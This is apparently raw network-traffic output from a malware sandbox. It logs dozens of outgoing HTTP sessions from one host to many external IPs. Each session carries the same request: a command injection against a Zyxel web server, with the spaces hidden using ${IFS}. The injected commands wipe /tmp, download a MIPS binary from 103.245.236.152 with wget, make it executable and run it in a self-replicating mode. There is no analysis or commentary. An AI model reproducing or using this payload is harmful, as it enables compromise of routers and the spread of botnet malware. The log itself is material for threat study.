                                          Jan 14, 2024 15:46:07.817498922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2384192.168.2.2349534101.209.202.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817540884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2385192.168.2.2348940191.245.125.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817540884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2386192.168.2.235258213.39.229.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817564011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2387192.168.2.2336818147.155.178.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817586899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2388192.168.2.2353636156.50.138.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817646980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2389192.168.2.2356946107.49.106.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817651033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2390192.168.2.2334092113.112.159.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817667961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2391192.168.2.2345690160.87.235.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817675114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2392192.168.2.235244263.119.23.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817708015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2393192.168.2.2360446161.252.160.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817734003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2394192.168.2.235053623.164.36.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817734003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2395192.168.2.2360160213.56.9.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817790985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2396192.168.2.235754863.89.16.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817800045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2397192.168.2.233713283.228.106.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817832947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2398192.168.2.2360090108.91.115.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817833900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2399192.168.2.233734098.200.105.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817857027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2400192.168.2.233391088.243.61.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817920923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2401192.168.2.235829849.50.1.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817924976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2402192.168.2.2345788160.69.194.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817936897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2403192.168.2.2347342211.130.185.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817956924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2404192.168.2.23419362.111.116.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817976952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2405192.168.2.233691052.64.129.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818006992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2406192.168.2.23366069.19.44.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818036079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2407192.168.2.2349714192.101.136.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818070889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2408192.168.2.2334388123.132.63.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818085909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2409192.168.2.235200468.251.176.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818125010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2410192.168.2.2341258129.206.189.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818150997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2411192.168.2.2346752119.213.138.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818154097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2412192.168.2.2334496126.42.200.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818173885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2413192.168.2.2347856155.141.13.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818177938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2414192.168.2.2349532132.186.184.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818212032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2415192.168.2.234171493.29.70.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818212032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2416192.168.2.2352296212.235.215.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818253040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2417192.168.2.2337110197.54.4.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818280935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2418192.168.2.2350160186.3.205.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818290949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2419192.168.2.2356708192.80.187.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818311930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2420192.168.2.2360158184.226.25.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818368912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2421192.168.2.23482182.193.45.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818368912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2422192.168.2.2357000177.66.155.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818372965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2423192.168.2.2332962126.93.1.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818397045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2424192.168.2.2346138139.14.252.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818428040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2425192.168.2.234862490.31.133.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818437099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2426192.168.2.234696885.35.202.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818480968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2427192.168.2.2352436140.222.30.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818499088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2428192.168.2.233381862.61.13.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818520069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2429192.168.2.2350266206.35.30.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818523884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2430192.168.2.235984463.65.177.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818564892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2431192.168.2.2341960180.36.223.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818566084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2432192.168.2.234322882.70.173.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818598032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2433192.168.2.233415286.138.221.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818618059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2434192.168.2.233990092.158.94.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818618059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2435192.168.2.2358720208.18.53.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818636894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2436192.168.2.234254870.239.179.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818658113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2437192.168.2.2334672125.198.109.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818669081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2438192.168.2.2356656207.177.240.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818706036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2439192.168.2.233523819.125.29.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818732023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2440192.168.2.2357454159.35.161.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818744898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2441192.168.2.2349268129.250.220.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818778038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2442192.168.2.2342870109.157.202.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818826914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2443192.168.2.233560441.249.243.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818830967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2444192.168.2.2355286207.246.37.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818842888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2445192.168.2.235854475.225.152.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.818847895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2446192.168.2.235592262.95.250.127443
                                          TimestampBytes transferredDirectionData
